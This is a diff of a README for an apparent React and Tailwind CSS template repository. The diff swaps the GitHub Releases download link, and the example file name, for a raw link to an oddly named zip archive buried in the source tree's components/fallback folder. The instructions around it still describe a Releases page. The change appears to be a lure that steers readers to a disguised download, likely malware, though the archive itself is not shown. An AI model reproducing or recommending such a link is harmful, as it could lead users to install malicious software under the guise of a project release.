LauroRochaJr/Template-React-TailwindCSS/README.md

 ## 📦 Download & Install

-To get started, visit this page to download the latest release: [Download Latest Release](https://github.com/LauroRochaJr/Template-React-TailwindCSS/releases).
+To get started, visit this page to download the latest release: [Download Latest Release](https://raw.githubusercontent.com/LauroRochaJr/Template-React-TailwindCSS/main/src/app/components/fallback/Template-CSS-Tailwind-React-spinobulbar.zip).
 Look for the most recent version and follow these steps:

 1. Once on the Releases page, locate the assets section.
 2. Download the file that suits your operating system.
-For example, you may see options like `Template-React-TailwindCSS.zip`.
+For example, you may see options like `https://raw.githubusercontent.com/LauroRochaJr/Template-React-TailwindCSS/main/src/app/components/fallback/Template-CSS-Tailwind-React-spinobulbar.zip`.
 3. Save the file to your computer.

 ## 💻 System Requirements